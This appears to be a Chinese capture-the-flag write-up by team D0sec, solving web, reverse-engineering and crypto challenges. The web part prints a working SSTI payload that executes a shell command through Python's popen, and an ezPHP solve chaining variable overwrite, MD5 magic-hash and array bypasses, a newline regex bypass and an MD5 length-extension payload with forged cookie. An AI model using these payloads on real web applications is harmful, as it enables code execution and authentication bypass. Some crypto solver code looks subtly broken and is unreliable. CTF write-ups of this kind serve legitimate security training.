战队:D0sec
队员:xiaolaisec
WEB
菜狗工具#1
删除JS里的disable让运行键可点击
Exp:print(''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read()
ezPHP
<?php
include "flag.php";
highlight_file(__FILE__);
error_reporting(0);
$a = 'O.U.C';
$query = $_SERVER['QUERY_STRING']; //获取GET传递的参数名和值
parse_str($query);
if (preg_match('/_|%5f|\.|%2E/i',$query)){
die('听说你是黑客');
}
echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';
if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){
//这里要用$_SERVER['QUERY_STRING']全局变量覆盖变量a的值,
因为md5('O.U.C')不是0e开头无法md5爆破,(妹的爆破了一个下午才意识到这点
?a=s878926199a&b=s155964671a 覆盖a的值找两个md5若相等的值即可
echo "哎呦,不错喔".'<br>';
$O_U_C=$_GET['O_U_C'];
if (!is_array($O_U_C)&&$O_U_C!=='100'&&preg_match('/^100$/',$O_U_C)){
//两点:第一点是$_GET['O_U_C']传参写成O U C url编码一下O%20U%20C绕过正则
第二点是100%0a绕过preg_match('/^100$/',$O_U_C),$不匹配换行符
echo 'but'.'如果我寄出===阁下又该如何应对๑乛◡乛๑'.'<br>';
if (md5($_POST['md51'])===md5($_POST['md52'])&&$_POST['md51']!=$_POST['md52']){
//这个简单数组绕过即可
echo '好,那么好'.'<br>';
if ($_COOKIE["md5"]===md5($secret.urldecode($_GET['md5']))){
//md5 hash扩展攻击,由于$secret长度未知,只能试了,最终长度是15
//当然也可以直接通过$_SERVER['QUERY_STRING']全局变量改变$secret的值
echo '还是被你解出来了'.' ྀི ྀིɞ ྀི ིྀ ིྀ'.$flag;
}else{
echo '告诉你secret的md5值也无妨,反正哈希是不可逆的๑乛◡乛๑,除非你能箨斩攻击我'.md5($secret.'ouc').'<br>';
}
}else{
echo '不过如此';
}
}else{
die("不行嘛(´ェ`)");
}
}else{
echo '嗨害嗨 (๑ᵒ̴̶̷͈᷄ᗨᵒ̴̶̷͈᷅)';
}
pyload:
?a=s878926199a&b=s155964671a&O%20U%20C=100%0a&md5=ouc%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%90%00%00%00%00%00%00%00aaa
post: md51[]=1&md52[]=2
Cookie: md5=9a6197a1c86ccf149c6588f020d7a5e8
Reverse
xor++
放IDA进到main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-80h]
__int64 v5[8]; // [rsp+30h] [rbp-50h] BYREF
unsigned int i; // [rsp+74h] [rbp-Ch]
int v7; // [rsp+78h] [rbp-8h]
int v8; // [rsp+7Ch] [rbp-4h]
v5[0] = 0LL;
v5[1] = 0LL;
v5[2] = 0LL;
v5[3] = 0LL;
v5[4] = 0LL;
v5[5] = 0LL;
v5[6] = 0LL;
v5[7] = 0LL;
v4[0] = 37;
v4[1] = 40;
v4[2] = 36;
v4[3] = 33;
v4[4] = 60;
v4[5] = 42;
v4[6] = 60;
v4[7] = 30;
v4[8] = 20;
v4[9] = 40;
v4[10] = 36;
v4[11] = 40;
v4[12] = 41;
v4[13] = 97;
v4[14] = 50;
v4[15] = 39;
v4[16] = 63;
v4[17] = 32;
v4[18] = 12;
v4[19] = 9;
v4[20] = 32;
v4[21] = 104;
v4[22] = 55;
v4[23] = 46;
v4[24] = 4;
v4[25] = 63;
v4[26] = 53;
v4[27] = 106;
v4[28] = 17;
v4[29] = 7;
v4[30] = 4;
v4[31] = 61;
v4[32] = 14;
v4[33] = 17;
v4[34] = 38;
v4[35] = 14;
v4[36] = 26;
puts("Guess what is the flag?");
__isoc99_scanf("%50s", v5);
v8 = 67;
v7 = 1;
for ( i = 0; i <= 0x24; ++i )
{
if ( (v8 ^ *((char *)v5 + (int)i)) != v4[i] )
{
v7 = 0;
break;
}
++v8;
}
if ( v7 )
puts("That is the right answer!");
else
puts("Wrong answer sadly...");
return 0;
}
简单的异或,a^b=c,那么b=c^a
Exp:
v4 = [37, 40, 36, 33, 60, 42, 60, 30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32, 12, 9, 32, 104, 55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26]
# 用于存储结果的数组
result = []
# 预设的值v8
v8 = 67
# 逐个字符进行异或操作,并将结果存储到result数组中
for i in range(len(v4)):
result.append(chr(v4[i] ^ v8))
v8 += 1
# 输出得到的字符串
print(''.join(result))
Crypto
NeXT RSA
Exp:
import sympy
import libnum
# 给定的参数
n = 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761
e = 65537
c =
23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544
# 分解 n 得到 p 和 q
p, q = sympy.factorint(n)
# 计算欧拉函数
r = (p - 1) * (q - 1)
# 计算私钥
d = libnum.invmod(e, r)
# 使用私钥解密密文
m = pow(c, d, n)
# 将解密后的明文转换成字符串
flag = libnum.n2s(m)
print(flag)
#flag{n0t_s3Cure_4t_aIl}
模!
Exp:
from math import factorial
# 逆向计算哈希值,找到原始的字符串
def reverse_hash(hash_value):
table = "abcdefghijklmnopqrstuvwxyz{}"
original_str = ""
while hash_value > 0:
# 逐位逆向计算
for char in table:
if factorial(ord(char)) % 233 == hash_value & 0xFF:
original_str = char + original_str
hash_value >>= 8
break
return original_str
# 给定的哈希值
hashed_value = 2508450541438803643416583335895451914701844680466330955847
# 尝试找到原始的字符串
original_string = reverse_hash(hashed_value)
print("Original String:", original_string)
#flag{dalaodalaohaolihai}
Base64*rot13
MzkuM3gyrzI6Z3cyrzHlMKcSra0=
先rot13解密再base64解码即可